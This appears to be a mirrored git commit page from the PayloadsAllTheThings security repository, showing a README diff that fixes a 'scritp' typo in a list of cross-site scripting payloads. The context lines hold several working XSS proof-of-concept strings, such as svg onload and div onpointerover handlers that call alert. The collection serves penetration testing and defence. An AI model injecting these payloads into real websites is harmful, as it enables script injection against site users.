mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Update README.md
This commit is contained in:
parent
ee12f8e480
commit
1fd9260d1e
1 changed files with 2 additions and 2 deletions
|
@ -180,8 +180,8 @@ Most tools are also suitable for blind XSS attacks:
|
||||||
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
"><svg/onload=alert(String.fromCharCode(88,83,83))>
|
||||||
"><svg/onload=alert(/XSS/)
|
"><svg/onload=alert(/XSS/)
|
||||||
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
|
||||||
<svg><scritp>alert('33')
|
<svg><script>alert('33')
|
||||||
<svg><scritp>alert('33')
|
<svg><script>alert('33')
|
||||||
|
|
||||||
// Div payload
|
// Div payload
|
||||||
<div onpointerover="alert(45)">MOVE HERE</div>
|
<div onpointerover="alert(45)">MOVE HERE</div>
|
||||||
|
|
Loading…
Reference in a new issue